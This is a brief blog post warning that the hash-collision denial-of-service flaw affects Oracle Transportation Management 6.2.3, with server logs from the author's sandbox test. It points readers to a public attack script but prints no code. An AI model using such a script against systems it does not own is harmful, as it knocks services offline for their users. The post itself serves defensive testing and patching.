Hash collision attacks hose Oracle Transportation Management

Ars had a great write-up a few weeks ago about the huge hash resource starvation attack that was uncovered awhile back (when I say awhile back, I mean from 2003).  The press has been focused on the impact for a relatively small number of the affected vendors; this is not only somewhat unfair, but also leads many to ignore that the issue may hit closer to home.

If you want to avoid script-kiddieism and have had a basic introduction to algorithms and O-notations, I strongly recommend reading the whitepaper Crosby-Wallach Usenix document.  If you just want to test your stack for issues, however, there’s a simple Python script you can grab to fire away at yourself on Github.  I pointed this at a sandbox OTM 6.2.3 installation, and, after a few sample payloads, struck gold.

INFO | 2012/02/01 17:25:11 | SEVERE: All threads (200) are currently busy, waiting. Increase maxThreads (200) or check the servlet status
INFO | 2012/02/01 17:25:33 | [INFO ][memory ] [YC#20] 682796.926-682796.970: YC 4173305KB->2485427KB (4915200KB), 0.044 s, sum of pauses 43.666 ms, longest pause 43.666 ms.
INFO | 2012/02/01 17:25:40 | Feb 1, 2012 5:25:40 PM org.apache.jk.common.ChannelSocket processConnection
INFO | 2012/02/01 17:25:40 | WARNING: processCallbacks status 2

 

I let the services continue to run, even after HTTP processes had died.  The web/app tier were unable to recover gracefully.  Moral of the story – just because Oracle didn’t release any notes specific to OTM doesn’t mean you don’t need to address the issue.